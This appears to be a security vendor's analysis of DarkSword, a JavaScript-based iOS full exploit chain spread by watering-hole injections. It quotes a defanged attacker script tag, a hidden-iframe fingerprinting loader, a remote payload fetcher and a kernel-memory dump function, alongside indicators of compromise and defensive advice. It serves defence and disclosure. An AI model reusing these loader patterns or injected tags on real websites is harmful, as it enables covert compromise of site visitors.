DarkSword marks a new step in iOS exploitation. Active since at least November 2025, this full-chain exploit links multiple vulnerabilities - several of them zero-days - to fully compromise iOS devices. The suspected Russian espionage group UNC6353 distributes it through watering hole attacks by injecting malicious script tags into legitimate, compromised websites. The central concern is delivery: a website's client-side environment becomes a vector for a nation-state exploit targeting visitors.
How the DarkSword exploit chain works
Earlier iOS exploit kits relied on binary components. DarkSword takes a different approach: the entire chain is written in JavaScript. By staying in JavaScript for every stage, the attackers avoid binary mitigations such as Apple's Page Protection Layer (PPL) and Secure Page Table Monitor (SPTM). The chain targets iOS versions in the 18.4-18.7 range and operates through several stages that escalate from an in-browser memory corruption to full kernel privilege.
Exploit stages
| Exploit Stage | Vulnerability | Description | Zero-day? |
|---|---|---|---|
| Remote Code Execution (RCE) | CVE-2025-31277 / CVE-2025-43529 | Memory corruption in JavaScriptCore (JIT type confusion and GC bugs). | CVE-2025-43529 was a zero-day |
| PAC bypass | CVE-2026-20700 | User-mode Pointer Authentication Code bypass in dyld. | Yes |
| WebContent sandbox escape | CVE-2025-14174 | Memory corruption in ANGLE, escaping to the GPU process. | Yes |
| GPU sandbox escape | CVE-2025-43510 | Memory management vulnerability in the iOS kernel, pivoting to mediaplaybackd. | No |
| Privilege escalation | CVE-2025-43520 | Memory corruption in the iOS kernel, granting full kernel privileges. | No |
After achieving full compromise, the exploit drops one of three JavaScript-based malware families: GHOSTBLADE, GHOSTKNIFE, or GHOSTSABER. These act as dataminers and backdoors, exfiltrating iMessages, cryptocurrency wallet data, location history, and saved WiFi passwords.
Example debugging code
Debugging code and comments left in the payloads show the authors' intent. GHOSTBLADE includes functions to hexdump kernel memory and specifically targets WiFi credentials:
const TAG = "DarkSword-WIFI-DUMP";
function kdump(where, size, msg = "") {
LOG(`[+] ----------- ${msg} ----------`);
for (let i = 0n; i < size; i += 0x10n) {
LOG(`[+] [${i.hex()}] ${(where + i).hex()}: ${early_kread64(where + i).hex()} ${early_kread64(where + i + 8n).hex()}`);
}
}
How DarkSword uses watering hole attacks to infect iOS devices
UNC6353 compromises legitimate websites and turns them into watering holes. When a target visits one of these sites, the attack runs silently in the background without user interaction. The attack typically starts with a single injected tag that appears benign in HTML but then loads attacker-controlled JavaScript from a third-party CDN.
Example (displayed escaped to avoid embedding an actual script tag):
<script async src="hxxps://static[.]cdncounter[.]net/widgets[.]js?uhfiu27fajf2948fjfefaa42"></script>From there the attack continues through client-side operations. The loader can create hidden 1x1 pixel iframes, use sessionStorage to track and fingerprint victims, and fetch additional obfuscated payloads via synchronous XHRs. Because all actions use standard web APIs, they blend into normal browser activity unless the client-side environment is monitored.
if (!sessionStorage.getItem("uid") && isTouchScreen) {
sessionStorage.setItem("uid", '1');
const frame = document.createElement("iframe");
frame.src = "frame.html?" + Math.random();
frame.style.height = 0;
frame.style.width = 0;
frame.style.border = "none";
document.body.appendChild(frame);
} else {
top.location.href = "red";
}
function getJS(fname,method = 'GET') {
try {
url = fname;
print(`trying to fetch ${method} from: ${url}`);
let xhr = new XMLHttpRequest();
xhr.open("GET", `${url}` , false);
xhr.send(null);
return xhr.responseText;
} catch(e) {
print("got error in getJS: " + e);
}
}
Why traditional security defenses miss DarkSword
DarkSword exposes a blind spot in most security setups. Perimeter defenses, WAFs, and many endpoint detection tools don't see activity inside the browser. The compromised website delivers what appears to be a normal client-side resource while the actual exploit loads from a third-party domain. Defending against these attacks requires visibility into client-side execution and the ability to detect anomalous browser behavior.
Indicators of compromise
- Unexpected script tags loading from unknown or suspicious domains;
- Hidden iframes with 1x1 pixel dimensions, near-zero opacity, or off-screen placement;
- Unusual sessionStorage or localStorage modifications by unauthorized scripts;
- XHR or Fetch requests retrieving additional obfuscated JavaScript payloads.
How to defend against DarkSword and watering hole attacks
Apple patched the DarkSword vulnerabilities in iOS 26.3, and users should update immediately. But patching endpoints only addresses one layer. As long as attackers can compromise legitimate websites and use them as delivery vehicles, watering hole attacks will continue. Website operators should harden supply chains, monitor for unauthorized injections, and use client-side monitoring to detect malicious script execution before it drops payloads like DarkSword.
